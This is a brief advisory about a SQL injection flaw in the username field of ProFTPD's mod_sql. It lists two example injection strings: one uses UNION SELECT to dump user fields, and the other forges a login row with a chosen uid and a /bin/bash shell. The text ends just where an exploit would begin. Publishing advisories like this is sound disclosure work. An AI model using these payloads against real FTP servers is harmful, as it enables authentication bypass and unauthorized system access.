ProFTPD 'mod_sql' Username SQL Injection Vulnerability
Attackers can use standard tools to exploit this issue.
The following example input is available:
username: %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
username: %') and 1=2 union (select <name>,1,<uid>,<gid>,0x2F,0x2F62696E2F62617368); -- a
The following exploit is available: